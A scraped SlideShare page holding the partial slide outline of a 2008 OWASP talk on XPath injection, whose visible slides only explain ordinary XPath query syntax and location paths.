User Centred Design and Implementation of Useful Picture Archiving and Commun... by Lighton Phiri
User Centred Design and Implementation of Useful Picture Archiving and Commun...User Centred Design and Implementation of Useful Picture Archiving and Commun...
User Centred Design and Implementation of Useful Picture Archiving and Commun...
Lighton Phiri24 views
This talk was not generated with ChatGPT: how AI is changing science by Elena Simperl
This talk was not generated with ChatGPT: how AI is changing scienceThis talk was not generated with ChatGPT: how AI is changing science
This talk was not generated with ChatGPT: how AI is changing science
Elena Simperl44 views
Modern Database Best Practices by All Things Open
Modern Database Best PracticesModern Database Best Practices
Modern Database Best Practices
All Things Open40 views
Business Analyst Series 2023 - Week 4 Session 8 by DianaGray10
Business Analyst Series 2023 - Week 4 Session 8Business Analyst Series 2023 - Week 4 Session 8
Business Analyst Series 2023 - Week 4 Session 8
DianaGray10238 views
Redefining the book supply chain: A glimpse into the future - Tech Forum 2023 by BookNet Canada
Redefining the book supply chain: A glimpse into the future - Tech Forum 2023Redefining the book supply chain: A glimpse into the future - Tech Forum 2023
Redefining the book supply chain: A glimpse into the future - Tech Forum 2023
BookNet Canada57 views
Cocktail of Environments. How to Mix Test and Development Environments and St... by Aleksandr Tarasov
Cocktail of Environments. How to Mix Test and Development Environments and St...Cocktail of Environments. How to Mix Test and Development Environments and St...
Cocktail of Environments. How to Mix Test and Development Environments and St...
Aleksandr Tarasov27 views
[2024] GDSC India - Discover, Design, Develop.pdf.pdf by bcedsc
[2024] GDSC India - Discover, Design, Develop.pdf.pdf[2024] GDSC India - Discover, Design, Develop.pdf.pdf
[2024] GDSC India - Discover, Design, Develop.pdf.pdf
bcedsc28 views
Optimizing Communication to Optimize Human Behavior - LCBM by Yaman Kumar
Optimizing Communication to Optimize Human Behavior - LCBMOptimizing Communication to Optimize Human Behavior - LCBM
Optimizing Communication to Optimize Human Behavior - LCBM
Yaman Kumar46 views
Cencora Executive Symposium by marketingcommunicati21
Cencora Executive SymposiumCencora Executive Symposium
Cencora Executive Symposium
marketingcommunicati21216 views
Initiating and Advancing Your Strategic GIS Governance Strategy by Safe Software
Initiating and Advancing Your Strategic GIS Governance StrategyInitiating and Advancing Your Strategic GIS Governance Strategy
Initiating and Advancing Your Strategic GIS Governance Strategy
Safe Software280 views
Digital Personal Data Protection (DPDP) Practical Approach For CISOs by Priyanka Aash
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Priyanka Aash187 views
Mobile Core Solutions & Successful Cases.pdf by IPLOOK Networks
Mobile Core Solutions & Successful Cases.pdfMobile Core Solutions & Successful Cases.pdf
Mobile Core Solutions & Successful Cases.pdf
IPLOOK Networks20 views
Measurecamp Brussels - Synthetic data.pdf by Human37
Measurecamp Brussels - Synthetic data.pdfMeasurecamp Brussels - Synthetic data.pdf
Measurecamp Brussels - Synthetic data.pdf
Human37 34 views
What is Authentication Active Directory_.pptx by HeenaMehta35
What is Authentication Active Directory_.pptxWhat is Authentication Active Directory_.pptx
What is Authentication Active Directory_.pptx
HeenaMehta3531 views
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023 by BookNet Canada
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023
BookNet Canada41 views
Elevating Event-Driven World: A Deep Dive into AsyncAPI v3 by Postman
Elevating Event-Driven World: A Deep Dive into AsyncAPI v3Elevating Event-Driven World: A Deep Dive into AsyncAPI v3
Elevating Event-Driven World: A Deep Dive into AsyncAPI v3
Postman19 views
Qualifying SaaS, IaaS.pptx by Sachin Bhandari
Qualifying SaaS, IaaS.pptxQualifying SaaS, IaaS.pptx
Qualifying SaaS, IaaS.pptx
Sachin Bhandari1.2K views
KubeConNA23 Recap.pdf by MichaelOLeary82
KubeConNA23 Recap.pdfKubeConNA23 Recap.pdf
KubeConNA23 Recap.pdf
MichaelOLeary8234 views
Show and tell: What’s in your tech stack? - Tech Forum 2023 by BookNet Canada
Show and tell: What’s in your tech stack? - Tech Forum 2023Show and tell: What’s in your tech stack? - Tech Forum 2023
Show and tell: What’s in your tech stack? - Tech Forum 2023
BookNet Canada40 views

XPath Injection

  • 1. OWASP – XPath Injection overview Roberto Suggi Liverani Security Consultant Security-Assessment.com 21 February 2008
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9. XPath Syntax – other query examples (3/3) Expression Result users Selects all the child nodes of the users element /users Selects the root element users users/user Selects all user elements that are children of users //users Selects all users elements no matter where they are in the document users//user Selects all user elements that are descendant of the users element, no matter where they are under the users element
  • 10.
  • 11.
  • 12. XPath Location Path – Examples (2/2) XPath Wilcards are bolded in red . XPath Axisname are underlined. Example Result child ::user Selects all user nodes that are children of the current node attribute ::id Selects the id attribute of the current node child :: * Selects all children of the current node attribute :: * Selects all attributes of the current node child :: text() Selects all text child nodes of the current node child :: node() Selects all child nodes of the current node descendant ::users Selects all users descendants of the current node
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.

Report as inappropriate

*Required
Copyright Complaint

3 likes

views

Total views7,142
On Slideshare0
From embeds0
Number of embeds0